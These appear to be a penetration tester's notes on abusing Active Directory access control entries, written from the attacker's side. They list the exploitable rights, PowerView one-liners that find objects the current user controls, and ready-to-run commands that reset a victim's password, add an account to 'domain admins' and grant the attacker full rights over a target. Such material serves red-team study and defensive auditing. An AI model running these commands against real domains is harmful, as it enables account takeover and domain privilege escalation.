ACLs/ACEs

Active Directory objects such as users and groups are securable objects and DACL/ACEs define who can read/modify those objects (i.e change account name, reset password, etc).

Some of the Active Directory object permissions and types that we as attackers are interested in:

• GenericAll - full rights to the object (add users to a group or reset user's password)

• GenericWrite - update object's attributes (i.e logon script)

• WriteOwner - change object owner to attacker controlled user take over the object

• WriteDACL - modify object's ACEs and give attacker full control right over the object

• AllExtendedRights - ability to add user to a group or reset password

• ForceChangePassword - ability to change user's password

• Self (Self-Membership) - ability to add yourself to a group

Enumerate with powerview

Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericAll"}  

Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")){$_}}

Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")){$_}}

reference https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces

The picture above is the example of enumerating ACLs in the Active Directory, here is the explaination:

1. Object (User) target.

2. The user that have access to that object

3. The access tipe is "GenericAll" mean to excessive.

GenericAll

Exploit with reset password

(GenericAll, ForceChangePassword, AllExtendedRight)

# user (force change password)
net user <username> <password> /domain

Add user to Group

(GenericAll, GenericWrite)

# group --> domain admin (force add member to domain admin)
net group "domain admins" <username> /add /domain

WriteDACL

# force apply generic all to the target username for current user
Add-DomainObjectAcl -TargetIdentity <target username> -PrincipalIdentity <current user> -Rights All

Reference:

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#execution